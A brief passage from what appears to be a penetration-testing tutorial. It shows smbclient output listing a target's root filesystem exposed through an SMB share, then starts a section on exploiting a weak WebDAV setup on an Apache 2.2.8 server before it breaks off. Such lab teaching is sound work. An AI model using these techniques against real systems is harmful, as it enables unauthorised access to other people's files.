  cdrom                              DR        0  Tue Mar 16 17:55:51 2010
  tmp                                 D        0  Fri Feb  7 12:16:32 2020
  srv                                DR        0  Tue Mar 16 17:57:38 2010

  7282168 blocks of size 1024. 5436096 blocks available
smb: \rootfs\> 

As you can see we got the rootfs folder with the contents of the root filesytem right there for us to browse through.

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...